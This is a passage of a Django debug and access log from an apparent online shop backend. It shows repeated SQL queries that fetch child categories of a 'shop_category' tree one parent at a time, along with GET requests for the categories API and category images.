"shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 02:37:33,579 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 02:37:33,582 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 02:37:33,586 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 02:37:33,589 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 02:37:33,592 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 02:37:33,596 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 02:37:33,599 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 02:37:33,604 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 02:37:33,607 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 02:37:33,610 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 02:37:33,613 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 02:37:33,616 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 02:37:33,620 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 02:37:33,623 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 02:37:33,626 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 02:37:33,630 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 02:37:33,633 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 02:37:33,637 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 02:37:33] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 02:37:33] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [20/Dec/2019 02:37:33] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 200 784410 [20/Dec/2019 02:37:33] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 200 784410 [20/Dec/2019 02:37:33] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 200 784410 [20/Dec/2019 02:37:33] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 200 784410 [20/Dec/2019 02:37:33] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 200 784410 [20/Dec/2019 02:37:35] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 200 784410 DEBUG 2019-12-20 02:37:35,205 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-20 02:37:35,211 utils 4252 140031732287232 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 02:37:35,222 utils 4252 140031503103744 (0.008) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 02:37:35,225 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 02:37:35,231 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 02:37:35,234 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 02:37:35,242 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 02:37:35,246 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) [20/Dec/2019 02:37:35] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-20 02:37:35,250 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 02:37:35,254 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 02:37:35,257 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 02:37:35,263 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 02:37:35,266 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 02:37:35,269 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 02:37:35,273 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 02:37:35,277 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 02:37:35,282 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 02:37:35,286 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 02:37:35,289 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 02:37:35,293 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 02:37:35,296 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 02:37:35,302 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 02:37:35,305 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 02:37:35,308 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 02:37:35,312 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 02:37:35,315 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 02:37:35,317 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 02:37:35,321 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 02:37:35,323 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 02:37:35,325 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 02:37:35,327 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 02:37:35,329 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 02:37:35,333 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 02:37:35,335 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 02:37:35,337 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 02:37:35,339 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 02:37:35,341 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 02:37:35,345 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 02:37:35,347 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 02:37:35,350 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 02:37:35,355 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 02:37:35,360 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 02:37:35,362 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 02:37:35,366 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 02:37:35,368 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 02:37:35,371 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 02:37:35,374 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 02:37:35,376 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", 